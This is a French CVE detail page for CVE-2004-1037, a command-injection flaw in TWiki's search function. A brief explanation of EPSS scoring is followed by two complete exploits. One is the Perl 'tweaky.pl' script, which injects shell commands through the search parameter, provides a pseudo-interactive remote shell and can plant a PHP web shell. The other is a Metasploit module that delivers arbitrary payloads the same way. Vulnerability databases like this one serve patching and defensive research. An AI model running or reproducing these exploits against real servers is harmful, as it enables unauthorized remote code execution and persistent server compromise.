CVE-2004-1037 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/perl # "tweaky.pl" v. 1.0 beta 2 # # Proof of concept for TWiki vulnerability. Remote code execution # Vuln discovered, researched and exploited by RoMaNSoFt <roman rs-labs com> # # Madrid, 30.Sep.2004. require LWP::UserAgent; use Getopt::Long; ### Default config $host = ''; $path = '/cgi-bin/twiki/search/Main/'; $secure = 0; $get = 0; $post = 0; $phpshellpath=''; $createphpshell = '(echo `perl -e \'print chr(60).chr(63)\'` ; echo \'$out = shell_exec($_GET["cmd"]. " 2\'`perl -e \'print chr(62).chr(38)\'`\'1");\' ; echo \'echo "\'`perl -e \'print chr(60)."pre".chr(62)."\\\\ $out".chr(60)."/pre".chr(62)\'`\'";\' ; echo `perl -e \'print chr(63).chr(62)\'`) | tee '; $logfile = ''; # If empty, logging will be disabled $prompt = "tweaky\$ "; $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'; $proxy = ''; $proxy_user = ''; $proxy_pass = ''; $basic_auth_user = ''; $basic_auth_pass = ''; $timeout = 30; $debug = 0; $init_command = 'uname -a ; id'; $start_mark = 'AAAA'; $end_mark = 'BBBB'; $pre_string = 'nonexistantttt\' ; ('; $post_string = ') | sed \'s/\(.*\)/'.$start_mark.'\1'.$end_mark.'.txt/\' ; fgrep -i -l -- \'nonexistantttt'; $delim_start = '<b>'.$start_mark; $delim_end = $end_mark.'</b>'; print "Proof of concept for TWiki vulnerability. Remote code execution.\n"; print "(c) RoMaNSoFt, 2004. <roman\@rs-labs.com>\n\n"; ### User-supplied config (read from the command-line) $parsing_ok = GetOptions ('host=s' => \$host, 'path=s' => \$path, 'secure' => \$secure, 'get' => \$get, 'post' => \$post, 'phpshellpath=s' => \$phpshellpath, 'logfile=s' => \$logfile, 'init_command=s' => \$init_command, 'useragent=s' => \$useragent, 'proxy=s' => \$proxy, 'proxy_user=s' => \$proxy_user, 'proxy_pass=s' => \$proxy_pass, 'basic_auth_user=s' => \$basic_auth_user, 'basic_auth_pass=s' => \$basic_auth_pass, 'timeout=i' => \$timeout, 'debug' => \$debug, 'start_mark=s' => \$start_mark, 'end_mark=s' => \$end_mark); ### Some basic checks &banner unless ($parsing_ok); if ($get and $post) { print "Choose one only method! (GET or POST)\n\n"; &banner; } if (!($get or $post)) { # If not specified we prefer POST method $post = 1; } if (!$host) { print "You must specify a target hostname! (tip: --host <hostname>)\n\n" ; &banner; } $url = ($secure ? 'https' : 'http') . "://" . $host . $path; ### Checking for a vulnerable TWiki &run_it ($init_command, 'RS-Labs rlz!'); ### Execute selected payload if ($phpshellpath) { &create_phpshell; print "PHPShell created."; } else { &pseudoshell; } ### End exit(0); ### Create PHPShell sub create_phpshell { $createphpshell .= $phpshellpath; &run_it($createphpshell, 'yeah!'); } ### Pseudo-shell sub pseudoshell { open(LOGFILE, ">>$logfile") if $logfile; open(STDINPUT, '-'); print "Welcome to RoMaNSoFt's pseudo-interactive shell :-)\n[Type Ctrl-D or (bye, quit, exit, logout) to exit]\n \n".$prompt.$init_command."\n"; &run_it ($init_command); print $prompt; while (<STDINPUT>) { chop; if ($_ eq "bye" or $_ eq "quit" or $_ eq "exit" or $_ eq "logout") { exit(1); } &run_it ($_) unless !$_; print "\n".$prompt; } close(STDINPUT); close(LOGFILE) if $logfile; } ### Print banner and die sub banner { print "Syntax: ./tweaky.pl --host=<host> [options]\n\n"; print "Proxy options: --proxy=http://proxy:port --proxy_user=foo --proxy_pass=bar\n"; print "Basic auth options: --basic_auth_user=foo --basic_auth_pass=bar\n"; print "Secure HTTP (HTTPS): --secure\n"; print "Path to CGI: --path=$path\n"; print "Method: --get | --post\n"; print "Enable logging: --logfile=/path/to/a/file\n"; print "Create PHPShell: --phpshellpath=/path/to/phpshell\n"; exit(1); } ### Execute command via vulnerable CGI sub run_it { my ($command, $testing_vuln) = @_; my $req; my $ua = new LWP::UserAgent; $ua->agent($useragent); $ua->timeout($timeout); # Build CGI param and urlencode it my $search = $pre_string . $command . $post_string; $search =~ s/(\W)/"%" . unpack("H2", $1)/ge; # Case GET if ($get) { $req = HTTP::Request->new('GET', $url . "?scope=text&order=modified&search=$search"); } # Case POST if ($post) { $req = new HTTP::Request POST => $url; $req->content_type('application/x-www-form-urlencoded'); $req->content("scope=text&order=modified&search=$search"); } # Proxy definition if ($proxy) { if ($secure) { # HTTPS request $ENV{HTTPS_PROXY} = $proxy; $ENV{HTTPS_PROXY_USERNAME} = $proxy_user; $ENV{HTTPS_PROXY_PASSWORD} = $proxy_pass; } else { # HTTP request $ua->proxy(['http'] => $proxy); $req->proxy_authorization_basic($proxy_user, $proxy_pass); } } # Basic Authorization $req->authorization_basic($basic_auth_user, $basic_auth_pass) if ($basic_auth_user); # Launch request and parse results my $res = $ua->request($req); if ($res->is_success) { print LOGFILE "\n".$prompt.$command."\n" if ($logfile and !$testing_vuln); @content = split("\n", $res->content); my $empty_response = 1; foreach $_ (@content) { my ($match) = ($_ =~ /$delim_start(.*)$delim_end/g); if ($debug) { print $_ . "\n"; } else { if ($match) { $empty_response = 0; print $match . "\n" unless ($testing_vuln); } } print LOGFILE $match . "\n" if ($match and $logfile and !$testing_vuln); } if ($empty_response) { if ($testing_vuln) { die "Sorry, exploit didn't work!\nPerhaps TWiki is patched or you supplied a wrong URL (remember it should point to Twiki's search page).\n"; } else { print "[Server issued an empty response. Perhaps you entered a wrong command?]\n"; } } } else { die "Couldn't connect to server. Error message follows:\n" . $res->status_line . "\n"; } } # milw0rm.com [2004-11-20]

## # $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'TWiki Search Function Arbitrary Command Execution', 'Description' => %q{ This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands. }, 'Author' => [ # Unknown - original discovery 'jduck' # metasploit version ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9671 $', 'References' => [ [ 'CVE', '2004-1037' ], [ 'OSVDB', '11714' ], [ 'BID', '11674' ], [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ] ], 'Privileged' => true, # web server context 'Payload' => { 'DisableNops' => true, 'BadChars' => ' ', 'Space' => 1024, }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Oct 01 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]), ], self.class) end def check content = rand_text_alphanumeric(16+rand(16)) test_file = rand_text_alphanumeric(8+rand(8)) cmd_base = datastore['URI'] + '/view/Main/WebSearch?search=' test_url = datastore['URI'] + '/view/Main/' + test_file # first see if it already exists (it really shouldn't) res = send_request_raw({ 'uri' => test_url }, 25) if (not res) or (res.body.match(content)) print_error("WARNING: The test file exists already!") return Exploit::CheckCode::Safe end # try to create it print_status("Attempting to create #{test_url} ...") search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'" res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25) if (not res) or (res.code != 200) return Exploit::CheckCode::Safe end # try to run it, 500 code == successfully made it res = send_request_raw({ 'uri' => test_url }, 25) if (not res) or (not res.body.match(content)) return Exploit::CheckCode::Safe end # delete the tmp file print_status("Attempting to delete #{test_url} ...") search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'" res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25) if (not res) or (res.code != 200) print_error("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable end def exploit search = rand_text_alphanumeric(1+rand(8)) search << "';" + payload.encoded + ";#\'" query_str = datastore['URI'] + '/view/Main/WebSearch' query_str << '?search=' query_str << Rex::Text.uri_encode(search) res = send_request_cgi({ 'method' => 'GET', 'uri' => query_str, }, 25) if (res and res.code == 200) print_status("Successfully sent exploit request") else raise RuntimeError, "Error sending exploit request" end handler end end